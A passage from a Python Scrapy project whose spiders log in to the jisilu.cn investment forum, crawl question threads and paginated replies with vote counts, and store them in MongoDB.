169 |                 agree = reply.xpath('.//em[@class="aw-border-radius-5 aw-vote-count pull-left"]/text()').extract_first()
170 |                 if agree is None:
171 |                     agree = 0
172 |                 else:
173 |                     agree = int(agree)
174 | 
175 |                 resp_.append(
176 |                     {replay_user.strip(): {'agree': agree, 'resp_content': rep_content.strip()}})
177 |             if len(resp_time_list)>0:
178 |                 resp_time = resp_time_list[0]
179 |             else:
180 |                 resp_time=None
181 |             item['resp'] = resp_
182 |             item['last_resp_date']=resp_time
183 | 
184 |             yield item
185 | 
186 |     # 详情页
187 |     def multi_page_detail(self, response):
188 | 
189 |         current_page = response.meta['page']
190 |         item = response.meta['item']
191 |         total_page = response.meta['total_page']
192 |         question_id = response.meta['question_id']
193 | 
194 |         resp_len = response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]/div')
195 | 
196 |         for index, reply in enumerate(
197 |                 response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]')):
198 |             replay_user = reply.xpath(
199 |                 './/div[@class="pull-left aw-dynamic-topic-content"]//p/a/text()').extract_first()
200 |             rep_content = reply.xpath(
201 |                 './/div[@class="pull-left aw-dynamic-topic-content"]//div[@class="markitup-box"]')[0].xpath(
202 |                 'string(.)').extract_first()
203 |             if rep_content:
204 |                 rep_content = rep_content.strip()
205 |             # rep_content = '\n'.join(rep_content)
206 | 
207 |             agree = reply.xpath('.//em[@class="aw-border-radius-5 aw-vote-count pull-left"]/text()').extract_first()
208 |             if agree is None:
209 |                 agree = 0
210 |             else:
211 |                 agree = int(agree)
212 | 
213 |             item['resp'].append(
214 |                 {replay_user.strip(): {'agree': agree, 'resp_content': rep_content.strip()}})
215 | 
216 |         current_page += 1
217 | 
218 |         if current_page <= total_page:
219 |             yield Request(url=self.MULTI_PAGE_DETAIL.format(question_id, current_page), headers=self.headers,
220 |                           callback=self.multi_page_detail,
221 |                           meta={'question_id': question_id, 'page': current_page, 'total_page': total_page,
222 |                                 'item': item})
223 |         else:
224 |             yield item


--------------------------------------------------------------------------------
/jsl/spiders/weekly_content.py:
--------------------------------------------------------------------------------
  1 | # -*- coding: utf-8 -*-
  2 | import datetime
  3 | import re
  4 | import scrapy
  5 | from scrapy import Request, FormRequest
  6 | from jsl.items import JslItem
  7 | from jsl import config
  8 | import logging
  9 | from jsl.spiders.aes_encode import decoder
 10 | import pymongo
 11 | 
 12 | # 按照日期爬取, 会损失新人贴
 13 | 
 14 | class WeekContentSpider(scrapy.Spider):
 15 |     name = 'week_content'
 16 | 
 17 |     headers = {
 18 |         'Host': 'www.jisilu.cn', 'Connection': 'keep-alive', 'Pragma': 'no-cache',
 19 |         'Cache-Control': 'no-cache', 'Accept': 'application/json,text/javascript,*/*;q=0.01',
 20 |         'Origin': 'https://www.jisilu.cn', 'X-Requested-With': 'XMLHttpRequest',
 21 |         'User-Agent': 'Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/67.0.3396.99Safari/537.36',
 22 |         'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
 23 |         'Referer': 'https://www.jisilu.cn/login/',
 24 |         'Accept-Encoding': 'gzip,deflate,br',
 25 |         'Accept-Language': 'zh,en;q=0.9,en-US;q=0.8'
 26 |     }
 27 | 
 28 |     start_page = 1
 29 | 
 30 |     POST_DATE_URL = 'https://www.jisilu.cn/home/explore/sort_type-add_time__category-__day-0__is_recommend-__page-{}'  # 发帖日期
 31 |     RESP_DATE_URL = 'https://www.jisilu.cn/home/explore/sort_type-new__category-__day-0__is_recommend-__page-{}'  # 回帖按照日期
 32 |     DETAIL_URL = 'https://www.jisilu.cn/question/{}&sort_key=agree_count&sort=DESC'
 33 |     MULTI_PAGE_DETAIL = 'https://www.jisilu.cn/question/id-{}__sort_key-__sort-DESC__uid-__page-{}'
 34 | 
 35 |     def __init__(self, daily='yes', *args, **kwargs):
 36 |         super().__init__(*args, **kwargs)
 37 | 
 38 |         if daily == 'yes':
 39 | 
 40 |             self.logger.info('按照周')
 41 |             self.DAYS = 14  # 获取2年的帖子
 42 |             self.URL = self.POST_DATE_URL
 43 | 
 44 |         self.last_week = datetime.datetime.now() + datetime.timedelta(days=-1 * self.DAYS)
 45 | 
 46 | 
 47 |         connect_uri = f'mongodb://{config.user}:{config.password}@{config.mongodb_host}:{config.mongodb_port}'
 48 |         self.db = pymongo.MongoClient(connect_uri)
 49 |         # self.user = u'neo牛3' # 修改为指定的用户名 如 毛之川 ，然后找到用户的id，在用户也的源码哪里可以找到 比如持有封基是8132
 50 |         self.collection = self.db['db_parker'][config.doc_name]
 51 | 
 52 |     def start_requests(self):
 53 | 
 54 |         login_url = 'https://www.jisilu.cn/login/'
 55 |         headersx = {
 56 |             'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
 57 |             'Accept-Encoding': 'gzip,deflate,br', 'Accept-Language': 'zh,en;q=0.9,en-US;q=0.8',
 58 |             'Cache-Control': 'no-cache', 'Connection': 'keep-alive',
 59 |             'Host': 'www.jisilu.cn', 'Pragma': 'no-cache', 'Referer': 'https://www.jisilu.cn/',
 60 |             'Upgrade-Insecure-Requests': '1',
 61 |             'User-Agent': 'Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/67.0.3396.99Safari/537.36'}
 62 | 
 63 |         yield Request(url=login_url, headers=headersx, callback=self.login, dont_filter=True)
 64 | 
 65 |     def login(self, response):
 66 |         url = 'https://www.jisilu.cn/account/ajax/login_process/'
 67 |         username = decoder(config.jsl_user)
 68 |         jsl_password = decoder(config.jsl_password)
 69 |         data = {
 70 |             'return_url': 'https://www.jisilu.cn/',
 71 |             'user_name': username,
 72 |             'password': jsl_password,
 73 |             'net_auto_login': '1',
 74 |             '_post_type': 'ajax',
 75 |         }
 76 | 
 77 |         yield FormRequest(
 78 |             url=url,
 79 |             headers=self.headers,
 80 |             formdata=data,
 81 |             callback=self.parse,
 82 |             dont_filter=True
 83 |         )
 84 | 
 85 |     def parse(self, response, **kwargs):
 86 |         print('登录后', response.text)
 87 |         focus_url = self.URL.format(self.start_page)
 88 | 
 89 |         yield Request(url=focus_url, headers=self.headers, callback=self.parse_page, dont_filter=True,
 90 |                       meta={'page': self.start_page})
 91 | 
 92 |     def parse_page(self, response):
 93 | 
 94 |         current_page = response.meta['page']
 95 | 
 96 |         nodes = response.xpath('//div[@class="aw-question-list"]/div')
 97 |         last_resp_date = None
 98 | 
 99 |         for node in nodes:
100 | 
101 |             each_url = node.xpath('.//h4/a/@href').extract_first()
102 |             try:
103 |                 last_resp_date = node.xpath('.//div[@class="aw-questoin-content"]/span/text()').extract()[-1].strip()
104 |                 # '回复  • 2018-12-10 09:49 • 46335 次浏览'
105 |                 last_resp_date = re.search('• (.*?) •', last_resp_date).group(1)
106 |             except:
107 |                 logging.error('failed to find date')
108 |                 continue
109 |             else:
110 |                 # 访问详情
111 |                 # 替换成这个 'https://www.jisilu.cn/question/320215&sort_key=agree_count&sort=DESC'
112 |                 # '"https://www.jisilu.cn/question/336326"'
113 |                 if re.search('www.jisilu.cn/question/\d+', each_url):
114 |                     question_id = re.search('www\.jisilu\.cn/question/(\d+)', each_url).group(1)
115 | 
116 |                     # if self.question_exist(question_id):
117 |                         # continue
118 | 
119 |                     # print(f'{question_id}帖子不存在，下载')
120 | 
121 |                     last_resp_date = datetime.datetime.strptime(last_resp_date, '%Y-%m-%d %H:%M')
122 |                     yield Request(url=self.DETAIL_URL.format(question_id), headers=self.headers,
123 |                                   callback=self.check_detail,
124 |                                   meta={'last_resp_date': last_resp_date, 'question_id': question_id})
125 | 
126 |         # 继续翻页
127 |         # print(last_resp_date)
128 |         if last_resp_date is not None and isinstance(last_resp_date,str):
129 |             last_resp_date = datetime.datetime.strptime(last_resp_date, '%Y-%m-%d %H:%M')
130 | 
131 |         if last_resp_date is not None and (self.last_week < last_resp_date):
132 |             # logging.info('last_resp_date ===== {}'.format(last_resp_date))
133 | 
134 |             current_page += 1
135 |             yield Request(url=self.URL.format(current_page), headers=self.headers, callback=self.parse_page,
136 |                           meta={'page': current_page})
137 | 
138 |     def question_exist(self,_id):
139 |         return True if self.collection.find_one({'question_id':_id},{'_id':1}) else False
140 | 
141 |     def compose_content(self,content_list):
142 |         string = ""
143 |         for line in content_list:
144 |             line = line.strip()
145 |             if len(line)>0:
146 |                 string+=line+'\n'
147 |         return string
148 | 
149 |     def check_detail(self, response):
150 | 
151 |         if '您访问的资源需要购买会员' in response.text:
152 |             return
153 | 
154 |         question_id = response.meta['question_id']
155 |         last_resp_date=response.meta['last_resp_date']
156 |         more_page = response.xpath('//div[@class="pagination pull-right"]')
157 | 
158 |         item = JslItem()
159 |         item['last_resp_date'] = last_resp_date
160 | 
161 |         title = response.xpath('//div[@class="aw-mod-head"]/h1/text()').extract_first()
162 |         item['question_id'] = question_id
163 |         content_node = response.xpath('//div[@class="aw-question-detail-txt markitup-box"]')
164 | 
165 |         content_html = content_node.extract_first() # 获取到源码
166 | 
167 |         # s = response.xpath('//div[@class="aw-question-detail-txt markitup-box"]').xpath('string(.)').extract_first()
168 |         # ret = re.findall('(.*?)\.donate_user_avatar', s, re.S)
169 |         # try:
170 |         #     content = ret[0].strip()
171 |         # except Exception as e:
172 |         #     # logging.error(e)
173 |         #     content = None
174 | 
175 |         content_list = content_node.xpath('string(.)').extract()
176 |         content_str = self.compose_content(content_list)
177 | 
178 |         createTime = response.xpath('//div[@class="aw-question-detail-meta"]/div/span/text()').extract_first()
179 |         # 'aw-question-detail-meta'
180 |         resp_no = response.xpath('//div[@class="aw-mod aw-question-detail-box"]//ul/h2/text()').re_first('\d+')
181 | 
182 |         url = response.url
183 | 
184 |         # 添加发起人
185 |         try:
186 |             item['creator'] = response.xpath('//div[@class="aw-side-bar-mod-body"]/dl/dd/a/text()').extract_first()
187 |         except Exception as e:
188 |             # logging.error(e)
189 |             item['creator'] = None
190 | 
191 |         item['title'] = title.strip()
192 |         item['content'] = content_str
193 |         item['content_html'] = content_html
194 | 
195 |         try:
196 |             item['resp_no'] = int(resp_no)
197 |         except Exception as e:
198 |             # logging.warning('没有回复')
199 |             item['resp_no'] = 0
200 |         if createTime is None:
201 |             # print(title)
202 |             # print(content)
203 |             return
204 |         item['createTime'] = createTime.replace('发表时间 ', '')
205 |         item['crawlTime'] = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
206 |         item['url'] = url.strip().replace('&sort_key=agree_count&sort=DESC','')
207 | 
208 |         # 多页
209 |         if more_page:
210 | 
211 |             total_resp_no = item['resp_no']
212 |             total_page = total_resp_no // 100 + 1
213 |             item['resp'] = []
214 | 
215 |             yield Request(url=self.MULTI_PAGE_DETAIL.format(question_id, 1), headers=self.headers,
216 |                           callback=self.multi_page_detail,
217 |                           meta={'question_id': question_id, 'page': 1, 'total_page': total_page,
218 |                                 'item': item})
219 | 
220 |         else:
221 | 
222 |             resp_ = []
223 |             # 回复内容
224 |             for index, reply in enumerate(
225 |                     response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]')):
226 |                 replay_user = reply.xpath(
227 |                     './/div[@class="pull-left aw-dynamic-topic-content"]//p/a/text()').extract_first()
228 |                 rep_content = reply.xpath(
229 |                     './/div[@class="pull-left aw-dynamic-topic-content"]//div[@class="markitup-box"]')[0].xpath(
230 |                     'string(.)').extract_first()
231 |                 # rep_content = '\n'.join(rep_content)
232 | 
233 |                 agree = reply.xpath('.//em[@class="aw-border-radius-5 aw-vote-count pull-left"]/text()').extract_first()
234 |                 if agree is None:
235 |                     agree = 0
236 |                 else:
237 |                     agree = int(agree)
238 | 
239 |                 resp_.append(
240 |                     {replay_user.strip(): {'agree': agree, 'resp_content': rep_content.strip()}})
241 | 
242 |             item['resp'] = resp_
243 |             yield item
244 | 
245 |     # 详情页
246 |     def multi_page_detail(self, response):
247 | 
248 |         current_page = response.meta['page']
249 |         item = response.meta['item']
250 |         total_page = response.meta['total_page']
251 |         question_id = response.meta['question_id']
252 | 
253 |         resp_len = response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]/div')
254 | 
255 |         for index, reply in enumerate(
256 |                 response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]')):
257 |             replay_user = reply.xpath(
258 |                 './/div[@class="pull-left aw-dynamic-topic-content"]//p/a/text()').extract_first()
259 |             rep_content = reply.xpath(
260 |                 './/div[@class="pull-left aw-dynamic-topic-content"]//div[@class="markitup-box"]')[0].xpath(
261 |                 'string(.)').extract_first()
262 |             if rep_content:
263 |                 rep_content = rep_content.strip()
264 | 
265 |             agree = reply.xpath('.//em[@class="aw-border-radius-5 aw-vote-count pull-left"]/text()').extract_first()
266 |             if agree is None:
267 |                 agree = 0
268 |             else:
269 |                 agree = int(agree)
270 | 
271 |             item['resp'].append(
272 |                 {replay_user.strip(): {'agree': agree, 'resp_content': rep_content.strip()}})
273 | 
274 |         current_page += 1
275 | 
276 |         if current_page <= total_page:
277 |             yield Request(url=self.MULTI_PAGE_DETAIL.format(question_id, current_page), headers=self.headers,
278 |                           callback=self.multi_page_detail,
279 |                           meta={'question_id': question_id, 'page': current_page, 'total_page': total_page,
280 |                                 'item': item})
281 |         else:
282 |             yield item
283 | 


--------------------------------------------------------------------------------
/jsl/spiders/allcontent.py:
--------------------------------------------------------------------------------
  1 | # -*- coding: utf-8 -*-
  2 | import datetime
  3 | import re
  4 | import scrapy
  5 | from scrapy import Request, FormRequest
  6 | from jsl.items import JslItem
  7 | from jsl import config
  8 | import logging
  9 | from jsl.spiders.aes_encode import decoder
 10 | import pymongo
 11 | 
 12 | # 按照日期爬取, 会损失新人贴
 13 | 
 14 | class AllcontentSpider(scrapy.Spider):
 15 |     name = 'allcontent'
 16 | 
 17 |     headers = {
 18 |         'Host': 'www.jisilu.cn', 'Connection': 'keep-alive', 'Pragma': 'no-cache',
 19 |         'Cache-Control': 'no-cache', 'Accept': 'application/json,text/javascript,*/*;q=0.01',
 20 |         'Origin': 'https://www.jisilu.cn', 'X-Requested-With': 'XMLHttpRequest',
 21 |         'User-Agent': 'Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/67.0.3396.99Safari/537.36',
 22 |         'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
 23 |         'Referer': 'https://www.jisilu.cn/login/',
 24 |         'Accept-Encoding': 'gzip,deflate,br',
 25 |         'Accept-Language': 'zh,en;q=0.9,en-US;q=0.8'
 26 |     }
 27 | 
 28 |     start_page = 1
 29 | 
 30 |     POST_DATE_URL = 'https://www.jisilu.cn/home/explore/sort_type-add_time__category-__day-0__is_recommend-__page-{}'  # 发帖日期
 31 |     RESP_DATE_URL = 'https://www.jisilu.cn/home/explore/sort_type-new__category-__day-0__is_recommend-__page-{}'  # 回帖按照日期
 32 |     DETAIL_URL = 'https://www.jisilu.cn/question/{}&sort_key=agree_count&sort=DESC'
 33 |     MULTI_PAGE_DETAIL = 'https://www.jisilu.cn/question/id-{}__sort_key-__sort-DESC__uid-__page-{}'
 34 | 
 35 |     def __init__(self, daily='yes', *args, **kwargs):
 36 |         super().__init__(*args, **kwargs)
 37 | 
 38 |         if daily == 'yes':
 39 |             self.DAYS = config.DAYS
 40 |             self.URL = self.POST_DATE_URL
 41 | 
 42 |         elif daily == 'no':
 43 |             # 全站爬取
 44 |             self.logger.info('全站爬取')
 45 |             self.DAYS = 365 * 2  # 获取2年的帖子
 46 |             self.URL = self.RESP_DATE_URL # 根据回复时间
 47 |         else:
 48 |             return
 49 |         self.last_week = datetime.datetime.now() + datetime.timedelta(days=-1 * self.DAYS)
 50 | 
 51 | 
 52 |         connect_uri = f'mongodb://{config.user}:{config.password}@{config.mongodb_host}:{config.mongodb_port}'
 53 |         self.db = pymongo.MongoClient(connect_uri)
 54 |         # self.user = u'neo牛3' # 修改为指定的用户名 如 毛之川 ，然后找到用户的id，在用户也的源码哪里可以找到 比如持有封基是8132
 55 |         self.collection = self.db[config.db_name][config.doc_name]
 56 | 
 57 |     def start_requests(self):
 58 | 
 59 |         login_url = 'https://www.jisilu.cn/login/'
 60 |         headersx = {
 61 |             'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
 62 |             'Accept-Encoding': 'gzip,deflate,br', 'Accept-Language': 'zh,en;q=0.9,en-US;q=0.8',
 63 |             'Cache-Control': 'no-cache', 'Connection': 'keep-alive',
 64 |             'Host': 'www.jisilu.cn', 'Pragma': 'no-cache', 'Referer': 'https://www.jisilu.cn/',
 65 |             'Upgrade-Insecure-Requests': '1',
 66 |             'User-Agent': 'Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/67.0.3396.99Safari/537.36'}
 67 | 
 68 |         yield Request(url=login_url, headers=headersx, callback=self.login, dont_filter=True)
 69 | 
 70 |     def login(self, response):
 71 |         url = 'https://www.jisilu.cn/account/ajax/login_process/'
 72 |         username = decoder(config.jsl_user)
 73 |         jsl_password = decoder(config.jsl_password)
 74 |         data = {
 75 |             'return_url': 'https://www.jisilu.cn/',
 76 |             'user_name': username,
 77 |             'password': jsl_password,
 78 |             'net_auto_login': '1',
 79 |             '_post_type': 'ajax',
 80 |         }
 81 | 
 82 |         yield FormRequest(
 83 |             url=url,
 84 |             headers=self.headers,
 85 |             formdata=data,
 86 |             callback=self.parse,
 87 |             dont_filter=True
 88 |         )
 89 | 
 90 |     def parse(self, response, **kwargs):
 91 |         # print('登录后', response.text)
 92 |         focus_url = self.URL.format(self.start_page)
 93 | 
 94 |         yield Request(url=focus_url, headers=self.headers, callback=self.parse_page, dont_filter=True,
 95 |                       meta={'page': self.start_page})
 96 | 
 97 |     def parse_page(self, response):
 98 | 
 99 |         current_page = response.meta['page']
100 | 
101 |         nodes = response.xpath('//div[@class="aw-question-list"]/div')
102 |         last_resp_date = None
103 | 
104 |         for node in nodes:
105 | 
106 |             each_url = node.xpath('.//h4/a/@href').extract_first()
107 |             try:
108 |                 last_resp_date = node.xpath('.//div[@class="aw-questoin-content"]/span/text()').extract()[-1].strip()
109 |                 # '回复  • 2018-12-10 09:49 • 46335 次浏览'
110 |                 last_resp_date = re.search('• (.*?) •', last_resp_date).group(1)
111 |             except:
112 |                 logging.error('failed to find date')
113 |                 continue
114 |             else:
115 |                 # 访问详情
116 |                 # 替换成这个 'https://www.jisilu.cn/question/320215&sort_key=agree_count&sort=DESC'
117 |                 # '"https://www.jisilu.cn/question/336326"'
118 |                 if re.search('www.jisilu.cn/question/\d+', each_url):
119 |                     question_id = re.search('www\.jisilu\.cn/question/(\d+)', each_url).group(1)
120 | 
121 |                     # if self.question_exist(question_id):
122 |                         # continue
123 | 
124 |                     # print(f'{question_id}帖子不存在，下载')
125 | 
126 |                     last_resp_date = datetime.datetime.strptime(last_resp_date, '%Y-%m-%d %H:%M')
127 |                     yield Request(url=self.DETAIL_URL.format(question_id), headers=self.headers,
128 |                                   callback=self.check_detail,
129 |                                   meta={'last_resp_date': last_resp_date, 'question_id': question_id})
130 | 
131 |         # 继续翻页
132 |         # print(last_resp_date)
133 |         if last_resp_date is not None and isinstance(last_resp_date,str):
134 |             last_resp_date = datetime.datetime.strptime(last_resp_date, '%Y-%m-%d %H:%M')
135 | 
136 |         if last_resp_date is not None and (self.last_week < last_resp_date):
137 |             # logging.info('last_resp_date ===== {}'.format(last_resp_date))
138 | 
139 |             current_page += 1
140 |             yield Request(url=self.URL.format(current_page), headers=self.headers, callback=self.parse_page,
141 |                           meta={'page': current_page})
142 | 
143 |     def question_exist(self,_id):
144 |         return True if self.collection.find_one({'question_id':_id},{'_id':1}) else False
145 | 
146 |     def compose_content(self,content_list):
147 |         string = ""
148 |         for line in content_list:
149 |             line = line.strip()
150 |             if len(line)>0:
151 |                 string+=line+'\n'
152 |         return string
153 | 
154 |     def check_detail(self, response):
155 | 
156 |         if '您访问的资源需要购买会员' in response.text:
157 |             return
158 | 
159 |         question_id = response.meta['question_id']
160 |         last_resp_date=response.meta['last_resp_date']
161 |         more_page = response.xpath('//div[@class="pagination pull-right"]')
162 | 
163 |         item = JslItem()
164 |         item['last_resp_date'] = last_resp_date
165 | 
166 |         title = response.xpath('//div[@class="aw-mod-head"]/h1/text()').extract_first()
167 |         item['question_id'] = question_id
168 |         content_node = response.xpath('//div[@class="aw-question-detail-txt markitup-box"]')
169 | 
170 |         content_html = content_node.extract_first() # 获取到源码
171 | 
172 |         # s = response.xpath('//div[@class="aw-question-detail-txt markitup-box"]').xpath('string(.)').extract_first()
173 |         # ret = re.findall('(.*?)\.donate_user_avatar', s, re.S)
174 |         # try:
175 |         #     content = ret[0].strip()
176 |         # except Exception as e:
177 |         #     # logging.error(e)
178 |         #     content = None
179 | 
180 |         content_list = content_node.xpath('string(.)').extract()
181 |         content_str = self.compose_content(content_list)
182 | 
183 |         createTime = response.xpath('//div[@class="aw-question-detail-meta"]/div/span/text()').extract_first()
184 |         # 'aw-question-detail-meta'
185 |         resp_no = response.xpath('//div[@class="aw-mod aw-question-detail-box"]//ul/h2/text()').re_first('\d+')
186 | 
187 |         url = response.url
188 | 
189 |         # 添加发起人
190 |         try:
191 |             item['creator'] = response.xpath('//div[@class="aw-side-bar-mod-body"]/dl/dd/a/text()').extract_first()
192 |         except Exception as e:
193 |             # logging.error(e)
194 |             item['creator'] = None
195 | 
196 |         item['title'] = title.strip()
197 |         item['content'] = content_str
198 |         item['content_html'] = content_html
199 | 
200 |         try:
201 |             item['resp_no'] = int(resp_no)
202 |         except Exception as e:
203 |             # logging.warning('没有回复')
204 |             item['resp_no'] = 0
205 |         if createTime is None:
206 |             # print(title)
207 |             # print(content)
208 |             return
209 |         item['createTime'] = createTime.replace('发表时间 ', '')
210 |         item['crawlTime'] = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
211 |         item['url'] = url.strip().replace('&sort_key=agree_count&sort=DESC','')
212 | 
213 |         # 多页
214 |         if more_page:
215 | 
216 |             total_resp_no = item['resp_no']
217 |             total_page = total_resp_no // 100 + 1
218 |             item['resp'] = []
219 | 
220 |             yield Request(url=self.MULTI_PAGE_DETAIL.format(question_id, 1), headers=self.headers,
221 |                           callback=self.multi_page_detail,
222 |                           meta={'question_id': question_id, 'page': 1, 'total_page': total_page,
223 |                                 'item': item})
224 | 
225 |         else:
226 | 
227 |             resp_ = []
228 |             # 回复内容
229 |             for index, reply in enumerate(
230 |                     response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]')):
231 |                 replay_user = reply.xpath(
232 |                     './/div[@class="pull-left aw-dynamic-topic-content"]//p/a/text()').extract_first()
233 |                 rep_content = reply.xpath(
234 |                     './/div[@class="pull-left aw-dynamic-topic-content"]//div[@class="markitup-box"]')[0].xpath(
235 |                     'string(.)').extract_first()
236 |                 # rep_content = '\n'.join(rep_content)
237 | 
238 |                 agree = reply.xpath('.//em[@class="aw-border-radius-5 aw-vote-count pull-left"]/text()').extract_first()
239 |                 if agree is None:
240 |                     agree = 0
241 |                 else:
242 |                     agree = int(agree)
243 | 
244 |                 resp_.append(
245 |                     {replay_user.strip(): {'agree': agree, 'resp_content': rep_content.strip()}})
246 | 
247 |             item['resp'] = resp_
248 |             item['only_add']=True
249 | 
250 |             yield item
251 | 
252 |     # 详情页
253 |     def multi_page_detail(self, response):
254 | 
255 |         current_page = response.meta['page']
256 |         item = response.meta['item']
257 |         total_page = response.meta['total_page']
258 |         question_id = response.meta['question_id']
259 | 
260 |         resp_len = response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]/div')
261 | 
262 |         for index, reply in enumerate(
263 |                 response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]')):
264 |             replay_user = reply.xpath(
265 |                 './/div[@class="pull-left aw-dynamic-topic-content"]//p/a/text()').extract_first()
266 |             rep_content = reply.xpath(
267 |                 './/div[@class="pull-left aw-dynamic-topic-content"]//div[@class="markitup-box"]')[0].xpath(
268 |                 'string(.)').extract_first()
269 |             if rep_content:
270 |                 rep_content = rep_content.strip()
271 |             # rep_content = '\n'.join(rep_content)
272 | 
273 |             agree = reply.xpath('.//em[@class="aw-border-radius-5 aw-vote-count pull-left"]/text()').extract_first()
274 |             if agree is None:
275 |                 agree = 0
276 |             else:
277 |                 agree = int(agree)
278 | 
279 |             item['resp'].append(
280 |                 {replay_user.strip(): {'agree': agree, 'resp_content': rep_content.strip()}})
281 | 
282 |         current_page += 1
283 |         # item['resp_no']=len(item['resp'])
284 |         if current_page <= total_page:
285 |             yield Request(url=self.MULTI_PAGE_DETAIL.format(question_id, current_page), headers=self.headers,
286 |                           callback=self.multi_page_detail,
287 |                           meta={'question_id': question_id, 'page': current_page, 'total_page': total_page,
288 |                                 'item': item})
289 |         else:
290 |             item['only_add']=True
291 |             yield item
292 | 


--------------------------------------------------------------------------------
/jsl/spiders/questions.py:
--------------------------------------------------------------------------------
  1 | # -*- coding: utf-8 -*-
  2 | import datetime
  3 | import re
  4 | import scrapy
  5 | from scrapy import Request, FormRequest
  6 | from jsl.items import JslItem
  7 | from jsl import config
  8 | import logging
  9 | import pymongo
 10 | 
 11 | # 遍历所有questions id 看从哪里开始
 12 | class QuestionSpider(scrapy.Spider):
 13 |     name = 'questions'
 14 | 
 15 |     headers = {
 16 |         'Host': 'www.jisilu.cn', 'Connection': 'keep-alive', 'Pragma': 'no-cache',
 17 |         'Cache-Control': 'no-cache', 'Accept': 'application/json,text/javascript,*/*;q=0.01',
 18 |         'Origin': 'https://www.jisilu.cn', 'X-Requested-With': 'XMLHttpRequest',
 19 |         'User-Agent': 'Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/67.0.3396.99Safari/537.36',
 20 |         'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
 21 |         'Referer': 'https://www.jisilu.cn/login/',
 22 |         'Accept-Encoding': 'gzip,deflate,br',
 23 |         'Accept-Language': 'zh,en;q=0.9,en-US;q=0.8'
 24 |     }
 25 | 
 26 |     POST_DATE_URL = 'https://www.jisilu.cn/home/explore/sort_type-add_time__category-__day-0__is_recommend-__page-{}'  # 发帖日期
 27 |     RESP_DATE_URL = 'https://www.jisilu.cn/home/explore/sort_type-new__category-__day-0__is_recommend-__page-{}'  # 回帖按照日期
 28 |     DETAIL_URL = 'https://www.jisilu.cn/question/{}&sort_key=agree_count&sort=DESC'
 29 |     MULTI_PAGE_DETAIL = 'https://www.jisilu.cn/question/id-{}__sort_key-__sort-DESC__uid-__page-{}'
 30 | 
 31 |     # self.doc =
 32 |     connect_uri = f'mongodb://{config.user}:{config.password}@{config.mongodb_host}:{config.mongodb_port}'
 33 |     db = pymongo.MongoClient(connect_uri)
 34 |     # self.user = u'neo牛3' # 修改为指定的用户名 如 毛之川 ，然后找到用户的id，在用户也的源码哪里可以找到 比如持有封基是8132
 35 |     # self.collection = self.db['db_parker']['jsl_20181108_allQuestion_test']
 36 |     collection = db['db_parker'][config.doc_name]
 37 | 
 38 |     def start_requests(self):
 39 |         login_url = 'https://www.jisilu.cn/login/'
 40 |         headers = {
 41 |             'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
 42 |             'Accept-Encoding': 'gzip,deflate,br', 'Accept-Language': 'zh,en;q=0.9,en-US;q=0.8',
 43 |             'Cache-Control': 'no-cache', 'Connection': 'keep-alive',
 44 |             'Host': 'www.jisilu.cn', 'Pragma': 'no-cache', 'Referer': 'https://www.jisilu.cn/',
 45 |             'Upgrade-Insecure-Requests': '1',
 46 |             'User-Agent': 'Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/67.0.3396.99Safari/537.36'}
 47 | 
 48 |         yield Request(url=login_url, headers=headers, callback=self.login, dont_filter=True)
 49 | 
 50 |     def login(self, response):
 51 |         url = 'https://www.jisilu.cn/account/ajax/login_process/'
 52 |         data = {
 53 |             'return_url': 'https://www.jisilu.cn/',
 54 |             'user_name': config.jsl_user,
 55 |             'password': config.jsl_password,
 56 |             'net_auto_login': '1',
 57 |             '_post_type': 'ajax',
 58 |         }
 59 | 
 60 |         yield FormRequest(
 61 |             url=url,
 62 |             headers=self.headers,
 63 |             formdata=data,
 64 |             callback=self.parse,
 65 |         )
 66 | 
 67 |     def question_exist(self,_id):
 68 |         return True if self.collection.find_one({'question_id':_id},{'_id':1}) else False
 69 | 
 70 |     def parse(self, response,**kwargs):
 71 |         lastest_id = config.LASTEST_ID  #
 72 | 
 73 |         for i in range(lastest_id + 5000, 1, -1):
 74 |             if not self.question_exist(lastest_id):
 75 |                 focus_url = 'https://www.jisilu.cn/question/{}'.format(i)
 76 |                 yield Request(url=focus_url, headers=self.headers, callback=self.parse_item, meta={'question_id': str(i)})
 77 |     def compose_content(self,content_list):
 78 |         string = ""
 79 |         for line in content_list:
 80 |             line = line.strip()
 81 |             if len(line)>0:
 82 |                 string+=line+'\n'
 83 |         return string
 84 | 
 85 |     def parse_item(self, response):
 86 |         item = JslItem()
 87 |         question_id = response.meta['question_id']
 88 | 
 89 |         title = response.xpath('//div[@class="aw-mod-head"]/h1/text()').extract_first()
 90 | 
 91 |         # s = response.xpath('//div[@class="aw-question-detail-txt markitup-box"]').xpath('string(.)').extract_first()
 92 | 
 93 |         # if s:
 94 |         #     ret = re.findall('(.*?)\.donate_user_avatar', s, re.S)
 95 |         # else:
 96 |         #     ret = None
 97 | 
 98 |         # try:
 99 |         #     content = ret[0].strip()
100 |         # except:
